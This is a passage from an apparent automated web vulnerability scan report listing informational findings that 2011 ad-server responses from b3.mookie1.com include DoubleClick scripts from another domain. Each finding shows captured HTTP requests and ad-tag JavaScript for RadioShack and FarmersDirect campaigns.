document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1043697033/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1043697033?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.83. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2670
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/113065
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1130656620/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1130656620?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.84. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:01:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.85. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3186
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1360207430?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.86. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90?http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542^950191^81^0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.87. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90?http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542^950191^81^0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=138763220?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.88. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2652
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/773887
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/77388754/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=77388754?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.89. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=78176531?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.90. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2670
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/171792
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1717927457/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1717927457?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.91. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:14:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=636403816?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.92. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2834
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
